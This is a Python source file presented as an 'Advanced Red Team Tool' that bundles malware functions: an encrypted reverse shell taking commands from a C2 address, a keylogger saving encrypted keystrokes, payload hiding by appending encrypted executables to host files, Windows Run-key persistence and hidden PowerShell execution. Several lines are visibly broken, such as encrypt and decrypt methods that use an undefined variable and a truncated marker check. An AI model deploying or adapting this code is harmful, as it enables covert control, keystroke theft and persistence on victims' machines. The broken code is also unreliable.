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| """
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| Advanced Red Team Tool - Modular, Extensible, and Secure
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|
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| Features:
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| - AES Encryption (CBC/GCM)
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| - Steganographic Payload Embedding
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| - Encrypted Reverse Shell
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| - Keylogger with Encrypted Logging
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| - Multiple Persistence Techniques
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| - Stealth PowerShell Execution
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| """
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|
|
| import os
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| import sys
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| import socket
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| import argparse
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| import logging
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| import json
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| import time
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| import threading
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| from typing import Optional, Union, List, Dict
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| from Crypto.Cipher import AES
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| from Crypto.Random import get_random_bytes
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| from Crypto.Protocol.KDF import PBKDF2
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| from Crypto.Util.Padding import pad, unpad
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| from Crypto.Util import Counter
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| from Crypto import Random
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| import ctypes
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| import winreg
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| import subprocess
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| from pynput import keyboard
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| import tempfile
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| import base64
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| logging.basicConfig(
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| level=logging.INFO,
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| format="%(asctime)s [%(levelname)s] %(message)s",
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| handlers=[logging.StreamHandler(sys.stdout)]
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| )
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|
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| DEFAULT_CONFIG = {
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| "default_ip": "127.0.0.1",
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| "default_port": 4444,
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| "persistence_name": "YSN_RedKill",
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| "marker": b"YSNRFD_PAYLOAD"
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| }
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| class AESCipher:
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| def __init__(self, key: bytes, mode: str = "CBC"):
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| self.key = key
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| self.mode = mode.upper()
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| self.block_size = AES.block_size
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|
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| def _get_cipher(self, iv: Optional[bytes] = None) -> AES:
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| if self.mode == "CBC":
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| if iv is None:
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| iv = get_random_bytes(self.block_size)
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| return AES.new(self.key, AES.MODE_CBC, iv), iv
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| elif self.mode == "GCM":
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| nonce = get_random_bytes(12)
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| return AES.new(self.key, AES.MODE_GCM, nonce=nonce), nonce
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| else:
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| raise ValueError(f"Unsupported mode: {self.mode}")
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|
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| def encrypt(self, bytes) -> bytes:
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| if self.mode == "CBC":
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| cipher, iv = self._get_cipher()
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| return iv + cipher.encrypt(pad(data, self.block_size))
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| elif self.mode == "GCM":
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| cipher, nonce = self._get_cipher()
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| ciphertext, tag = cipher.encrypt_and_digest(data)
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| return nonce + tag + ciphertext
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|
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| def decrypt(self, bytes) -> bytes:
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| if self.mode == "CBC":
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| iv = data[:self.block_size]
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| cipher = AES.new(self.key, AES.MODE_CBC, iv)
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| return unpad(cipher.decrypt(data[self.block_size:]), self.block_size)
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| elif self.mode == "GCM":
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| nonce = data[:12]
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| tag = data[12:28]
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| ciphertext = data[28:]
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| cipher = AES.new(self.key, AES.MODE_GCM, nonce=nonce)
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| return cipher.decrypt_and_verify(ciphertext, tag)
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|
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| @staticmethod
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| def derive_key(password: str, salt: bytes = b"YSN_SALT", dk_len: int = 32) -> bytes:
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| return PBKDF2(password, salt, dkLen=dk_len, count=1000000)
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|
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| def save_key(self, path: str, password: Optional[str] = None):
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| if password:
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| derived = self.derive_key(password)
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| cipher = AESCipher(derived, mode="CBC")
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| encrypted = cipher.encrypt(self.key)
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| with open(path, "wb") as f:
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| f.write(encrypted)
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| else:
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| with open(path, "wb") as f:
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| f.write(self.key)
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|
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| @classmethod
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| def load_key(cls, path: str, password: Optional[str] = None) -> "AESCipher":
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| with open(path, "rb") as f:
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| raw = f.read()
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| if password:
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| derived = cls.derive_key(password)
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| cipher = AESCipher(derived, mode="CBC")
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| key = cipher.decrypt(raw)
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| else:
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| key = raw
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| return cls(key)
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| class PayloadEmbedder:
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| def __init__(self, cipher: AESCipher, marker: bytes = DEFAULT_CONFIG["marker"]):
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| self.cipher = cipher
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| self.marker = marker
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| def embed(self, host_path: str, payload_path: str, output_path: str):
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| try:
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| with open(host_path, "rb") as f:
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| host_data = f.read()
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| with open(payload_path, "rb") as f:
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| payload_data = f.read()
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| encrypted = self.cipher.encrypt(payload_data)
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| with open(output_path, "wb") as f:
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| f.write(host_data + self.marker + encrypted)
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| logging.info(f"[+] Payload embedded in {output_path}")
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| except Exception as e:
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| logging.error(f"[-] Embed failed: {e}")
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| def extract(self, stego_path: str, output_path: str):
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| try:
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| with open(stego_path, "rb") as f:
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| data = f.read()
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| if self.marker not in
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| logging.error("[-] Marker not found")
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| return False
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| payload = data.split(self.marker)[1]
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| decrypted = self.cipher.decrypt(payload)
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| with open(output_path, "wb") as f:
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| f.write(decrypted)
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| logging.info(f"[+] Payload extracted to {output_path}")
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| return True
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| except Exception as e:
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| logging.error(f"[-] Extraction failed: {e}")
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| return False
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| class EncryptedReverseShell:
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| def __init__(self, ip: str, port: int, cipher: AESCipher):
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| self.ip = ip
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| self.port = port
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| self.cipher = cipher
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| def start(self):
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| try:
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| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
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| s.connect((self.ip, self.port))
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| logging.info(f"[*] Connected to {self.ip}:{self.port}")
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| while True:
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| enc_cmd = s.recv(4096)
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| if not enc_cmd:
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| break
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| cmd = self.cipher.decrypt(enc_cmd).decode()
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| if cmd.lower() in ['exit', 'quit']:
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| break
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| try:
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| output = subprocess.run(cmd.split(), capture_output=True, timeout=10)
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| enc_out = self.cipher.encrypt(output.stdout or output.stderr)
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| s.send(enc_out)
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| except Exception as e:
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| s.send(self.cipher.encrypt(str(e).encode()))
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| s.close()
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| except Exception as e:
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| logging.error(f"[-] Reverse shell error: {e}")
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| def start_reverse_shell_thread(ip: str, port: int, cipher: AESCipher):
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| thread = threading.Thread(target=EncryptedReverseShell(ip, port, cipher).start, daemon=True)
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| thread.start()
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| logging.info(f"[*] Reverse shell thread started connecting to {ip}:{port}")
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| class PersistenceManager:
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| @staticmethod
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| def add_registry(name: str, path: str):
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| try:
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| key = winreg.OpenKey(winreg.HKEY_CURRENT_USER,
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| r"Software\Microsoft\Windows\CurrentVersion\Run", 0,
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| winreg.KEY_SET_VALUE)
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| winreg.SetValueEx(key, name, 0, winreg.REG_SZ, path)
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| winreg.CloseKey(key)
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| logging.info(f"[*] Added registry persistence: {name}")
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| except Exception as e:
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| logging.error(f"[-] Registry persistence failed: {e}")
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| @staticmethod
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| def add_startup(name: str, path: str):
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| startup_folder = os.path.join(os.environ["APPDATA"], r"Microsoft\Windows\Start Menu\Programs\Startup")
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| shortcut_path = os.path.join(startup_folder, f"{name}.lnk")
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| logging.info(f"[*] Added startup persistence: {shortcut_path}")
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| def start_keylogger(output: str = "keylog.enc", password: str = "logpass"):
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| cipher = AESCipher.derive_key(password)
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| enc_cipher = AESCipher(cipher)
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| def on_press(key):
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| try:
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| char = key.char
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| except AttributeError:
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| char = str(key)
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| encrypted = enc_cipher.encrypt(char.encode())
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| with open(output, "ab") as f:
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| f.write(encrypted + b"\n")
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| listener = keyboard.Listener(on_press=on_press)
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| listener.start()
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| logging.info("[*] Keylogger started.")
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| def run_powershell_script(script: str):
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| try:
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| tmp = tempfile.NamedTemporaryFile(delete=False, suffix=".ps1")
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| tmp.write(script.encode())
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| tmp.close()
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| subprocess.Popen(["powershell", "-WindowStyle", "Hidden", "-File", tmp.name],
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| stdout=subprocess.DEVNULL,
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| stderr=subprocess.DEVNULL,
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| stdin=subprocess.DEVNULL)
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| logging.info("[*] PowerShell script executed.")
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| os.unlink(tmp.name)
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| except Exception as e:
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| logging.error(f"[-] PowerShell execution failed: {e}")
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| def main():
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| parser = argparse.ArgumentParser(description="Advanced Red Team Tool")
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| subparsers = parser.add_subparsers(dest="command")
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| embed_parser = subparsers.add_parser("embed", help="Embed payload into host file")
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| embed_parser.add_argument("--host", required=True, help="Path to host file")
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| embed_parser.add_argument("--payload", required=True, help="Path to payload executable")
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| embed_parser.add_argument("--output", required=True, help="Output stego file")
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| embed_parser.add_argument("--key", help="Path to encryption key file")
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| embed_parser.add_argument("--password", help="Password to derive key from")
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| extract_parser = subparsers.add_parser("extract", help="Extract payload from stego file")
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| extract_parser.add_argument("--stego", required=True, help="Path to stego file")
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| extract_parser.add_argument("--output", required=True, help="Output payload path")
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| extract_parser.add_argument("--key", required=True, help="Path to encryption key file")
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| extract_parser.add_argument("--password", help="Password for key decryption")
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| shell_parser = subparsers.add_parser("shell", help="Start encrypted reverse shell")
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| shell_parser.add_argument("--ip", default=DEFAULT_CONFIG["default_ip"], help="C2 IP")
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| shell_parser.add_argument("--port", type=int, default=DEFAULT_CONFIG["default_port"], help="C2 Port")
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| shell_parser.add_argument("--key", required=True, help="Path to encryption key file")
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| shell_parser.add_argument("--password", help="Password for key decryption")
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| keylog_parser = subparsers.add_parser("keylog", help="Start encrypted keylogger")
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| keylog_parser.add_argument("--output", default="keylog.enc", help="Output log file")
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| keylog_parser.add_argument("--password", default="logpass", help="Password for log encryption")
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| ps_parser = subparsers.add_parser("powershell", help="Execute PowerShell script")
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| ps_parser.add_argument("--script", required=True, help="PowerShell script content")
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| persist_parser = subparsers.add_parser("persistence", help="Add persistence")
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| persist_parser.add_argument("--name", default=DEFAULT_CONFIG["persistence_name"], help="Name for persistence entry")
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| persist_parser.add_argument("--path", required=True, help="Path to executable")
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| args = parser.parse_args()
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| if args.command == "embed":
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| if args.password:
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| key = AESCipher.derive_key(args.password)
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| cipher = AESCipher(key)
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| elif args.key:
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| cipher = AESCipher.load_key(args.key)
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| else:
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| cipher = AESCipher(get_random_bytes(32))
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| cipher.save_key("default.key")
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| logging.warning("[!] No key provided. Generated default.key")
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| embedder = PayloadEmbedder(cipher)
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| embedder.embed(args.host, args.payload, args.output)
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|
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| elif args.command == "extract":
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| cipher = AESCipher.load_key(args.key, password=args.password)
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| embedder = PayloadEmbedder(cipher)
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| embedder.extract(args.stego, args.output)
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|
|
| elif args.command == "shell":
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| cipher = AESCipher.load_key(args.key, password=args.password)
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| start_reverse_shell_thread(args.ip, args.port, cipher)
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|
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| elif args.command == "keylog":
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| start_keylogger(args.output, args.password)
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|
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| elif args.command == "powershell":
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| run_powershell_script(args.script)
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|
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| elif args.command == "persistence":
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| PersistenceManager.add_registry(args.name, args.path)
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|
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| else:
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| parser.print_help()
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|
|
| if __name__ == "__main__":
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| main() |